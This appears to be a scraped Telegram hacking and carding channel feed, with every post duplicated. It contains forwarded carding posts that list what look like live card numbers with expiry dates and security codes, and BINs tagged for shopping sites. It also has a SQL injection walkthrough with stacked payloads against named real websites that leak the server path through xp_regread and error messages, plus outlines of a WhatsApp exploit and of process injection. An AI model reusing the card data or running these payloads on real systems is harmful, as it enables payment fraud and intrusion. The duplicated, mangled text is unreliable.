Forwarded from TARJETAS PRO UNDER CARDING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ LiveCCN β :
374207289062001|02|24|9127
374207212051006|07|20|2310
374207670392009|02|20|2410
374207930492003|04|20|2493
374202532774007|06|22|5316
374202509031001|07|24|6185
372328545401007|05|20|2788
374204031742006|04|20|2201
372329167191009|05|20|3516
375341651270659|02|20|2521
374205587922009|09|23|2622
374207822117015|12|20|2235
372650630751008|10|20|2475
379005322391006|01|20|2314
372742017743110|04|20|2511
372329574231000|05|20|9581
375341740132225|06|20|2442
379136124372376|71|12|0229
379136513422101|30|42|0255
374206986581008|10|20|2221
374207348481002|04|23|3095
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ LiveCCN β :
374207289062001|02|24|9127
374207212051006|07|20|2310
374207670392009|02|20|2410
374207930492003|04|20|2493
374202532774007|06|22|5316
374202509031001|07|24|6185
372328545401007|05|20|2788
374204031742006|04|20|2201
372329167191009|05|20|3516
375341651270659|02|20|2521
374205587922009|09|23|2622
374207822117015|12|20|2235
372650630751008|10|20|2475
379005322391006|01|20|2314
372742017743110|04|20|2511
372329574231000|05|20|9581
375341740132225|06|20|2442
379136124372376|71|12|0229
379136513422101|30|42|0255
374206986581008|10|20|2221
374207348481002|04|23|3095
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL you need to know aboUT WhatsApp UAF Vulnerability Analysis (CVE-2019-11932)
t.me/UndercodeTesting
π¦ βββ£ 'ββ’ ββ£ββ‘β£ :
1) The attacker sends GIF files to users through any channel. One of them can be WhatsApp as a document (for example, press the "Gallery" button and select "Document" to send the damaged GIF)
If the attacker is in the contact list of the user (ie friend), the corrupted GIF will be downloaded automatically without any user interaction.
2) The user wants to send the media file to any of his / her WhatsApp friends. Therefore, the user presses the "Gallery" button and opens the WhatsApp Gallery to select the media file to be sent to his friend. Please note that the user does not have to send anything, because just opening WhatsApp Gallery will trigger the error. No additional touch is required after pressing WhatsApp Gallery.
3) Since WhatsApp will display a preview of each media (including the received GIF file), it will trigger a double-free error and our RCE utilization.
This vulnerability will affect WhatsApp versions prior to 2.19.244, and Android 8.1 and 9.0 versions.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL you need to know aboUT WhatsApp UAF Vulnerability Analysis (CVE-2019-11932)
t.me/UndercodeTesting
π¦ βββ£ 'ββ’ ββ£ββ‘β£ :
1) The attacker sends GIF files to users through any channel. One of them can be WhatsApp as a document (for example, press the "Gallery" button and select "Document" to send the damaged GIF)
If the attacker is in the contact list of the user (ie friend), the corrupted GIF will be downloaded automatically without any user interaction.
2) The user wants to send the media file to any of his / her WhatsApp friends. Therefore, the user presses the "Gallery" button and opens the WhatsApp Gallery to select the media file to be sent to his friend. Please note that the user does not have to send anything, because just opening WhatsApp Gallery will trigger the error. No additional touch is required after pressing WhatsApp Gallery.
3) Since WhatsApp will display a preview of each media (including the received GIF file), it will trigger a double-free error and our RCE utilization.
This vulnerability will affect WhatsApp versions prior to 2.19.244, and Android 8.1 and 9.0 versions.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from TARJETAS PRO UNDER CARDING
π¦ BIN Netflix
Bin : 511842003062xxxx
Fetcha : 05/23
Bin : 511842005991xxxx
Fetcha : 03/24
Bin : 511842007478xxxx
Fetcha : 11/25
Bin : 511842000167xxxx
Fetcha : 06/25
Bin : 511842004404xxxx
Fetcha : 10/25
CVV: 000
IP : Peru
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Bin : 511842003062xxxx
Fetcha : 05/23
Bin : 511842005991xxxx
Fetcha : 03/24
Bin : 511842007478xxxx
Fetcha : 11/25
Bin : 511842000167xxxx
Fetcha : 06/25
Bin : 511842004404xxxx
Fetcha : 10/25
CVV: 000
IP : Peru
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Web path scanner :
t.me/UndercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/maurosoria/dirsearch.git
2) cd dirsearch
3) python3 dirsearch.py -u <URL> -e <EXTENSION>
π¦FEATURES :
Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Heuristically detects invalid web pages
Recursive brute forcing
HTTP proxy support
User agent randomization
Batch processing
Request delaying
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Web path scanner :
t.me/UndercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/maurosoria/dirsearch.git
2) cd dirsearch
3) python3 dirsearch.py -u <URL> -e <EXTENSION>
π¦FEATURES :
Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Heuristically detects invalid web pages
Recursive brute forcing
HTTP proxy support
User agent randomization
Batch processing
Request delaying
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS PROCESS INJECTION ?
This technique involves the execution of malicious code and injecting the same into another running valid process, thereby causing the process to execute the code while preventing suspicion and evading detection. This allows the malicious code to run using the processβs memory, resources and elevated privileges. In addition, it allows the code to potentially evade suspicion from security solutions such as host-based firewalls, antivirus, EDRs and so on, as the code is running under a valid process.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS PROCESS INJECTION ?
This technique involves the execution of malicious code and injecting the same into another running valid process, thereby causing the process to execute the code while preventing suspicion and evading detection. This allows the malicious code to run using the processβs memory, resources and elevated privileges. In addition, it allows the code to potentially evade suspicion from security solutions such as host-based firewalls, antivirus, EDRs and so on, as the code is running under a valid process.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Nowadays, there are various methods utilized by attackers and malwares to perform process injection techniques .
> The following describes some of these techniques (Process Injection )
t.me/UndercodeTesting
1) Classic DLL injection: In this method, the malware creates a DLL on the disk and links its path string in the virtual address space of the target process, thus ensuring the process executes it. The DLL then inherits the same access to all objects and resources as the target process. In addition, since the malware creates a DLL on the disk, it makes it susceptible to being detected by security products
2) Process hollowing: In this method, the malware spawns a new instance of the target process by overwriting the memory space of the target process and replacing it with the malicious code. This technique is known as process hollowing and makes the malware stealthier than the classic DLL injection, as it feels like a valid process
3) Portable executable (βPEβ) injection: In this method, the malware copies its malicious code into the virtual address space of the target process and causes it to execute via a shellcode or the CreateRemoteThread function. The malware allocates memory in the target process and loads its malicious code into it instead of linking its path string, as in the case of classic DLL injection. In addition, this means the target process is running two (2) different codes (the legitimate process and the malware) via it and relies on Windows APIs
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Nowadays, there are various methods utilized by attackers and malwares to perform process injection techniques .
> The following describes some of these techniques (Process Injection )
t.me/UndercodeTesting
1) Classic DLL injection: In this method, the malware creates a DLL on the disk and links its path string in the virtual address space of the target process, thus ensuring the process executes it. The DLL then inherits the same access to all objects and resources as the target process. In addition, since the malware creates a DLL on the disk, it makes it susceptible to being detected by security products
2) Process hollowing: In this method, the malware spawns a new instance of the target process by overwriting the memory space of the target process and replacing it with the malicious code. This technique is known as process hollowing and makes the malware stealthier than the classic DLL injection, as it feels like a valid process
3) Portable executable (βPEβ) injection: In this method, the malware copies its malicious code into the virtual address space of the target process and causes it to execute via a shellcode or the CreateRemoteThread function. The malware allocates memory in the target process and loads its malicious code into it instead of linking its path string, as in the case of classic DLL injection. In addition, this means the target process is running two (2) different codes (the legitimate process and the malware) via it and relies on Windows APIs
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ANDROID PENTESTING GUIDE :
>Installed SDKs are on the following paths:
1) Windows:
C:\Users\<username>\AppData\Local\Android\sdk
MacOS:
/Users/<username>/Library/Android/sdk
Note: On Linux, you need to choose an SDK directory. /opt, /srv, and /usr/local are common choices.
2) Setting up the Android NDK :
> The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains directory of the NDK, which contains one subdirectory for each architecture.
π¦Architecture Toolchain name
ARM-based arm-linux-androideabi-<gcc-version>
x86-based x86-<gcc-version>
MIPS-based mipsel-linux-android-<gcc-version>
ARM64-based aarch64-linux-android-<gcc-version>
X86-64-based x86_64-<gcc-version>
MIPS64-based mips64el-linux-android-<gcc-version>
Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Possible sysroots for each Android API level are in $NDK/platforms/. Each API level directory contains subdirectories for the various CPUs and architectures.
3) One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchainβa "temporary" toolchain that incorporates the required settings.
4) To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:
$ ./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain
5) This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain. For convenience, you can export an environment variable that points to your toolchain directory, (we'll be using this in the examples). Run the following command or add it to your .bash_profile or other startup script:
$ export TOOLCHAIN=/tmp/android-7-toolchain
π¦Testing Device
For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on a emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices
π¦ANDROID PENTESTING GUIDE :
>Installed SDKs are on the following paths:
1) Windows:
C:\Users\<username>\AppData\Local\Android\sdk
MacOS:
/Users/<username>/Library/Android/sdk
Note: On Linux, you need to choose an SDK directory. /opt, /srv, and /usr/local are common choices.
2) Setting up the Android NDK :
> The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains directory of the NDK, which contains one subdirectory for each architecture.
π¦Architecture Toolchain name
ARM-based arm-linux-androideabi-<gcc-version>
x86-based x86-<gcc-version>
MIPS-based mipsel-linux-android-<gcc-version>
ARM64-based aarch64-linux-android-<gcc-version>
X86-64-based x86_64-<gcc-version>
MIPS64-based mips64el-linux-android-<gcc-version>
Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Possible sysroots for each Android API level are in $NDK/platforms/. Each API level directory contains subdirectories for the various CPUs and architectures.
3) One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchainβa "temporary" toolchain that incorporates the required settings.
4) To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:
$ ./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain
5) This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain. For convenience, you can export an environment variable that points to your toolchain directory, (we'll be using this in the examples). Run the following command or add it to your .bash_profile or other startup script:
$ export TOOLCHAIN=/tmp/android-7-toolchain
π¦Testing Device
For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on a emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
π¦ BIN Shopping Multifunctionalπ³
π³527515008098xxxx
Fetcha : 07/23
CVV : RND
IP : USA
β½οΈVICTORIA SECRET
β½οΈEBAY
β½οΈAMAZON [πͺπΈ]
β½οΈZULILY
β½οΈDREAM PRODUCT
β½οΈAWS
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π³527515008098xxxx
Fetcha : 07/23
CVV : RND
IP : USA
β½οΈVICTORIA SECRET
β½οΈEBAY
β½οΈAMAZON [πͺπΈ]
β½οΈZULILY
β½οΈDREAM PRODUCT
β½οΈAWS
> how use bin : https://t.me/UnderCodeTesting/3768
> cc generators 2020 : https://t.me/UnderCodeTesting/3411
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦For advance hackers - View WEB absolute path directory command by undercode :
t.me/UndercodeTesting
1) View the WEB website installation directory command:
? cscript c: \ inetpub \ adminscripts \ adsutil.vbs enum w3svc / 2 / root> c: \ test1.txt (try 2 instead of 1, 3, 4, 5)
type c: \ test1.txt
del c: \ test1.txt
The operation result can be displayed directly under NBSI, so there is no need to export to a file
2) Randomly find the name of a picture on the website 123.jpg
Then write it into the batch program 123.bat:
d:
dir 123.jpg / s> c: \ 123.txt
e:
dir 123.jpg / s >> c: \ 123.txt
f:
dir 123.jpg / s >> c: \ 123.txt
After execution type c: \ 123.txt
This way to analyze the path of the website
3) The SQL server and the website server are on the same server. Okay, you can execute commands, right?
Output the execution command to
% windir% \ help \ iishelp \ common \ 404b.htm or 500.asp
Note the two files Backup before output
Such as:
dir c: \>% windir% \ help \ iishelp \ common \ 404b.htm
Then simply enter a file to access: http: // target ip / 2.asp
4) For win2000 system:
xp_regread read HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots to get WEB path
2003 system: no method of use found
Such as:
(1) Create a new table cyfd (field is gyfd): http://www.7k7k5.com /NewsShow.aspx?id=4844;create table [dbo]. [Cyfd] ([gyfd] [char] (255) )-
(2) Write the web path: http://www.7k7k5.com /NewsShow.aspx?id=4844; DECLARE @result varchar (255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM \ CONTROLSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into cyfd (gyfd) values ββ(@result);-
(3) Still make him mismatch, display error: http://www.hack68.com /NewsShow.aspx?id=4844 and 1 = (select count (*) from cyfd where gyfd> 1)
Source: .Net SqlClient Data Provider
Description: A grammatical error occurred when converting the varchar value 'Y: \ Web \ Yantai Talent Hotline Background Management System, 201' to a column of data type int.
TargeSite: Boolean Read () Hahaha. . The path is exposed. .
(4) Next delete the table: http://www.7k7k5.com /NewsShow.aspx?id=4844;drop table cyfd;-
5) Use the regedit command to export the registry and save the exported results to% windir% \ help \ iishelp \ common \ 404b.htm or 500.asp page
regedit command description:
Regedit / L: system / R: user / E filename.reg Regpath
Parameter meaning:
/ L: system specifies the path where the System.dat file is located.
/ R: user specifies the path where the User.dat file is located.
/ E: This parameter specifies that the registry editor is to export the registry. Leave a space after this parameter and enter the file name of the exported registry.
Regpath: Used to specify which registry branch to export. If not specified, all registry branches will be exported. Among these parameters, the "/ L: system" and "/ R: user" parameters are optional. If these two parameters are not used, the registry editor considers them to be "system.dat" and "" in the WINDOWS directory. user.dat "file. If you boot from a floppy disk and enter DOS, you must use the "/ L" and "/ R" parameters to specify the specific path of the "system.dat" and "user.dat" files, otherwise the Registry Editor will not be able to find they. For example, if you enter DOS through the boot disk, the command to back up the registry is "Regedit / L: C: \ windows \ / R: C: \ windows \ / e regedit.reg", the command means to register the entire The table is backed up to the WINDOWS directory, and its file name is "regedit.reg". If you enter the "regedit /ED:\regedit.reg" command, it means that the entire registry is backed up to the root directory of the D drive (the "/ L" and "/ R" parameters are omitted). The file name is "Regedit.reg".
regedit /sc:\adam.reg import c: \ adam.reg file to the registry
regedit /ec:\web.reg Back up all registered content to c: \ web.reg
π¦For advance hackers - View WEB absolute path directory command by undercode :
t.me/UndercodeTesting
1) View the WEB website installation directory command:
? cscript c: \ inetpub \ adminscripts \ adsutil.vbs enum w3svc / 2 / root> c: \ test1.txt (try 2 instead of 1, 3, 4, 5)
type c: \ test1.txt
del c: \ test1.txt
The operation result can be displayed directly under NBSI, so there is no need to export to a file
2) Randomly find the name of a picture on the website 123.jpg
Then write it into the batch program 123.bat:
d:
dir 123.jpg / s> c: \ 123.txt
e:
dir 123.jpg / s >> c: \ 123.txt
f:
dir 123.jpg / s >> c: \ 123.txt
After execution type c: \ 123.txt
This way to analyze the path of the website
3) The SQL server and the website server are on the same server. Okay, you can execute commands, right?
Output the execution command to
% windir% \ help \ iishelp \ common \ 404b.htm or 500.asp
Note the two files Backup before output
Such as:
dir c: \>% windir% \ help \ iishelp \ common \ 404b.htm
Then simply enter a file to access: http: // target ip / 2.asp
4) For win2000 system:
xp_regread read HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots to get WEB path
2003 system: no method of use found
Such as:
(1) Create a new table cyfd (field is gyfd): http://www.7k7k5.com /NewsShow.aspx?id=4844;create table [dbo]. [Cyfd] ([gyfd] [char] (255) )-
(2) Write the web path: http://www.7k7k5.com /NewsShow.aspx?id=4844; DECLARE @result varchar (255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM \ CONTROLSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into cyfd (gyfd) values ββ(@result);-
(3) Still make him mismatch, display error: http://www.hack68.com /NewsShow.aspx?id=4844 and 1 = (select count (*) from cyfd where gyfd> 1)
Source: .Net SqlClient Data Provider
Description: A grammatical error occurred when converting the varchar value 'Y: \ Web \ Yantai Talent Hotline Background Management System, 201' to a column of data type int.
TargeSite: Boolean Read () Hahaha. . The path is exposed. .
(4) Next delete the table: http://www.7k7k5.com /NewsShow.aspx?id=4844;drop table cyfd;-
5) Use the regedit command to export the registry and save the exported results to% windir% \ help \ iishelp \ common \ 404b.htm or 500.asp page
regedit command description:
Regedit / L: system / R: user / E filename.reg Regpath
Parameter meaning:
/ L: system specifies the path where the System.dat file is located.
/ R: user specifies the path where the User.dat file is located.
/ E: This parameter specifies that the registry editor is to export the registry. Leave a space after this parameter and enter the file name of the exported registry.
Regpath: Used to specify which registry branch to export. If not specified, all registry branches will be exported. Among these parameters, the "/ L: system" and "/ R: user" parameters are optional. If these two parameters are not used, the registry editor considers them to be "system.dat" and "" in the WINDOWS directory. user.dat "file. If you boot from a floppy disk and enter DOS, you must use the "/ L" and "/ R" parameters to specify the specific path of the "system.dat" and "user.dat" files, otherwise the Registry Editor will not be able to find they. For example, if you enter DOS through the boot disk, the command to back up the registry is "Regedit / L: C: \ windows \ / R: C: \ windows \ / e regedit.reg", the command means to register the entire The table is backed up to the WINDOWS directory, and its file name is "regedit.reg". If you enter the "regedit /ED:\regedit.reg" command, it means that the entire registry is backed up to the root directory of the D drive (the "/ L" and "/ R" parameters are omitted). The file name is "Regedit.reg".
regedit /sc:\adam.reg import c: \ adam.reg file to the registry
regedit /ec:\web.reg Back up all registered content to c: \ web.reg